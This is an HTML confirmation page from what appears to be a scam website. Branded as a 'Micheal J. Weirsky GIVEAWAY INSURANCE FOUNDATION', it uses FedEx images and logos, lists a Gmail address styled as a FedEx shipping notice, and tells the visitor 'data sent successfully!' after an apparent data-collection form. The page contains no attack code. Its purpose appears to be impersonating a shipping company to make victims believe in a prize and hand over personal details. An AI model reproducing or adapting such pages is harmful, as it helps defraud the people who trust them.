<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@100;300;400;500&display=swap" rel="stylesheet">
    <title>Micheal J. Weirsky GIVEAWAY INSURANCE FOUNDATION</title>
    <link rel="stylesheet" href="success.css">
    <script src="jquery-3.6.3.js"></script>
    <!-- <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> -->
    <script src="https://cdn.jsdelivr.net/npm/jquery-validation@1.19.5/dist/jquery.validate.js"></script>
    
</head>
<body>

    <div class="main-body">
        <div class="container">
            <div class="hero">
                <img src="./images/FedEx-van3.jpg" alt="">
            </div>
            <div class="company-name">
                <span>Micheal J. Weirsky GIVEAWAY INSURANCE FOUNDATION</span>
                <p>Proudly supported by Florida PB.shipping Via..fedexnotice4@gmail.com <i class="fa-solid fa-truck"></i></i></p>
            </div>

            <div class="center">
                <div class="hero-txt">
                    <span>data sent successfully!</span>
                    <span class="back-ancker"><a href="C:\Users\emman\OneDrive\Desktop\MJ-INS\MJ.html">go back</a></span>
                </div>
            </div>


            <footer>
                <p>
                    This content is neither created nor endorsed by <strong><a href="">FedEx Cooperation</a> . 
                    </strong><a href="">Report Abuse</a> - <a href="">Terms of Service</a> - <a href="">Privacy Policy</a>
                </p>

                <div class="f-logo-box"><img src="./images/fedex_- logo-1000x278.png" alt=""></div>
            </footer>

        </div>

    
    </div>
    <!-- <script defer src="MJ.js"></script> -->
</body>
</html>



